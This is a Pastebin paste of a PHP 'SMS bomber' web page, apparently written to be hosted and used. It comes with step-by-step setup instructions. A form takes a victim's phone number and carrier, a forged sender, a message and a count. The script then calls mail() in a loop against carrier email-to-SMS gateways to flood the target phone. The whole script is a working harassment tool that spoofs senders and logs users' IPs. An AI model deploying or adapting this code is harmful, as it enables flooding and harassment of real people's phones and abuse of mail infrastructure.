Advertisement
RFH

PHP SMS BOMBER SCRIPT

RFH
Jun 18th, 2013
202,993
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.78 KB | None | 0 0
  1. <p style="text-align: center;">
  2. IP's are being logged, don't abuse this free bomber.
  3. </p>
  4.  
  5. <?php
  6.  
  7. //Copy & Paste EVERYTHING in this file and save it in notepad as index.php. It will not work if you don't copy everything and it wont work unless it's saved as a index.php. Once you have the file you can upload it to your website/hosting. I personally use ulmb.com.
  8. // Open up notepad++ and paste this source into a new document. Edit the password if you choose and save this
  9. // as smsbomber and select PHP as the Save As Type File You will end up with a file named smsbomber.php
  10. // Create a txt file named log.txt and make sure you put it in the same directory as the smsbomber.php file
  11. // When you are done remember the default password is:  PASSWORD
  12. session_start();
  13. // Change Your Password Here
  14. $v_PASSWORD = "ridgehf";
  15.  
  16. $v_USER_IP = $_SERVER['REMOTE_ADDR'];
  17.  
  18. $v_DATE = date( 'l jS \of F Y h:i:s A' );
  19. $v_LOG_FILE = fopen( "Log.txt", a );
  20. // Mobile Punish
  21. echo'<html>
  22.    <body bgcolor="black" text="#33ff00">
  23.    <table align="center" cellspacing="5">
  24.  
  25.    <tr><td colspan=2 align="center"> <font size="6"><strong>Mobile SMS Punisher</strong></font> <br /><font color="#FF0000">by <br />Ridgeâ„¢</font></td></tr>';
  26.  
  27. if(( $_POST['pass_submit'] && $_POST['pass'] == $v_PASSWORD ) || $_SESSION['loggedin'] == 1 )
  28. {
  29.     $_SESSION['loggedin'] = 1;
  30. // The Name You Save Your .php file as  can be changed here.  Change "smsbomber.php" to your choosing if you named your saved file different
  31.     echo'<form action="index.php" method="post" name="submit">
  32.        <tr><td></td></tr>
  33.  
  34.        <tr>
  35.            <td align="right" width="40%">Carrier: </td>
  36.              <td>
  37.                  <select name="carrier">
  38.          <option value="tmobile">T-Mobile</option>
  39.           <option value="virginmobile">Virgin Mobile</option>
  40.           <option value="cingular">ATT</option>
  41.           <option value="sprint">Sprint</option>
  42.           <option value="verizon">Verizon</option>
  43.           <option value="nextel">Nextel</option>
  44.                  </select>
  45.              </td>
  46.        </tr>
  47.  
  48.        <tr>
  49.            <td align="right">Number: </td>
  50.            <td><input type="text" name="number" /></td>
  51.        </tr>
  52.  
  53.        <tr>
  54.            <td align="right">From: </td>
  55.            <td><input type="text" name="from" /></td>
  56.        </tr>
  57.  
  58.        <tr>
  59.            <td align="right">Subject: </td>
  60.            <td><input type="text" name="sub" /></td>
  61.        </tr>
  62.  
  63.        <tr>
  64.            <td align="right">Message: </td>
  65.            <td><input type="text" name="body" /></td>
  66.        </tr>
  67.  
  68.        <tr>
  69.            <td align="right">Count: </td>
  70.            <td><input type="text" name="count" /></td>
  71.        </tr>
  72.  
  73.        <tr>
  74.            <td colspan=2 align="center"><input type="submit" name="submit" value="BOMB IT" /></td>
  75.  
  76. <p style="text-align: center;">
  77. Source Code Download:
  78.  
  79. <a href="http://pastebin.com/m9k9mnZc">Source Code Here</a>
  80.  
  81. </p>
  82.  
  83.        </tr>
  84.    </form>';
  85.  
  86.     fwrite( $v_LOG_FILE, $v_USER_IP." ACCESSED THIS TOOL ON [ ".$v_DATE." ]"."\n" );
  87.  
  88.     if( $_POST['submit'] )
  89.     {
  90.         $v_NUMBER = $_POST['number'];
  91.  
  92.         $v_FROM  = 'MIME-Version: 1.0' . "\r\n";
  93.         $v_FROM .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
  94.         $v_FROM .= 'From: ' . $_POST['from'] . '<' . $_POST['from'] . '>' . "\r\n";
  95.  
  96.         $v_COUNT      = $_POST['count'];
  97.         $v_SUBJECT  = $_POST['sub'];
  98.         $v_BODY      = $_POST['body'];
  99.         $v_CARRIER  = $_POST['carrier'];
  100.  
  101.         if( $v_CARRIER == "tmobile" )
  102.             $v_CARRIER = $v_NUMBER."@tmomail.net";
  103.         else if( $v_CARRIER == "virginmobile" )
  104.                  $v_CARRIER = $v_NUMBER."@vmobl.com";
  105.         else if( $v_CARRIER == "cingular" )
  106.                  $v_CARRIER = $v_NUMBER."@cingularme.com";
  107.         else if( $v_CARRIER == "sprint" )
  108.                  $v_CARRIER = $v_NUMBER."@messaging.sprintpcs.com";
  109.         else if( $v_CARRIER == "verizon" )
  110.                  $v_CARRIER = $v_NUMBER."@vtext.com";
  111.         else if( $v_CARRIER == "nextel" )
  112.                  $v_CARRIER = $v_NUMBER."@nextel.com";
  113.         else
  114.             die( "Invalid Selection." );
  115.  
  116.         for( $i = 0; $i < $v_COUNT; $i++ )
  117.         {
  118.             mail( $v_CARRIER, $v_SUBJECT, $v_BODY, $v_FROM );
  119.         }
  120.  
  121.         fwrite( $v_LOG_FILE, $v_USER_IP." Bombed [ ".$v_NUMBER." ] On [ ".$v_DATE." ] [ ".$v_COUNT." ] Times\n" );
  122.  
  123.         echo '<div align="center"><font size="6">';
  124.         echo "Bomed ".$v_NUMBER." ".$v_COUNT." times!";
  125.         echo '</font></div>';
  126.     }
  127. }
  128. else
  129. {
  130.     if( $_POST['pass_submit'] )
  131.     {
  132.         if( $_POST['pass'] != "" )
  133.         {
  134.             echo'<tr><td colspan=2 align="center"> <font size="6" color="#FF0000" ><strong>INVALID PASS!</strong></font></td></tr>';
  135.             fwrite( $v_LOG_FILE, $v_USER_IP." FAILED LOGIN ON [ ".$v_DATE." ]\n" );
  136.         }
  137.         else if( $_POST['pass'] == "" )
  138.         {
  139.             echo'<tr><td colspan=2 align="center"> <font size="6" color="#FF0000" ><strong>ENTER A PASS!</strong></font></td></tr>';
  140.         }
  141.     }
  142.  
  143.     echo'<form action="index.php" method="post" name="pass_submit">
  144.  <tr><td></td></tr>
  145.  <tr>
  146.    <td align="center"><font color="#ff">Password: </font></td>
  147.  </tr>
  148.  
  149.      <tr>
  150.        <td align="center"><input type="text" name="pass" /></td>
  151.      </tr>
  152.  
  153.      <tr>
  154.        <td colspan=2 align="center"><input type="submit" name="pass_submit" value="Login" /></td>
  155.      </tr>
  156.      </form>';
  157. }
  158.  
  159. echo'</table>
  160.     </body>
  161.     </html>';
  162.  
  163. ?>
  164.  
  165. <script type="text/javascript" src="http://adfoc.us/js/siteoverlay/script.js"></script>
  166. <script type="text/javascript">
  167.     var id_user = 10859;
  168.     var frequency_cap = 50;
  169.     var delay_nextad = 5;
  170.     var delay_pageload = 0;
  171. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement